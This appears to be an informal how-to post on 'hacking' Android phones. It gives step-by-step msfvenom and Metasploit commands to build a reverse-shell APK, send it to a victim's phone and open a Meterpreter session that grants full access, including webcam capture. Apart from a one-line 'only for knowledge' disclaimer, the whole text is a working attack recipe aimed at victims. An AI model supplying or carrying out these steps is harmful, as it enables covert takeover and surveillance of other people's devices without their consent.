HOW TO HACK ANDROID PHONE
HACKS....
hi guys this method is only for knowledge do not use this to harm anyone..
REQUIREMENTS:
- A KALI LINUX MACHINE
- BASIC KNOWLEDGE OF LINUX
LETS START HACKING:)
- OPEN YOUR TERMINAL
- TYPE ( msfvenom -p android/meterpreter/reverse_tcp lhost (here localhost is the ip address of that network from which your victim’s android device is connected if you dont have an ip or the victim is connnected to global network then go to http://www.no-ip.com here u get a free stable ip adress)=ip adress lport=4444 R > name.apk
- then it will create a apk file in check in directory and send this apk file to your victim’s android phone
- now the apk file is installed in victim’s phone now we are starting hack
- now open terminal and type msfconsole then it starts metasploit
- now type use multi/handler
- then type set payload android/meterpreter/reverse_tcp
- then type set lhost(ip you used while making payload)
- then type set lport 4444
- now type exploit
- it starts a metasploit session
- now type help then it shows hacking commands like webcam_snap
now you have all access to victim’s phone:)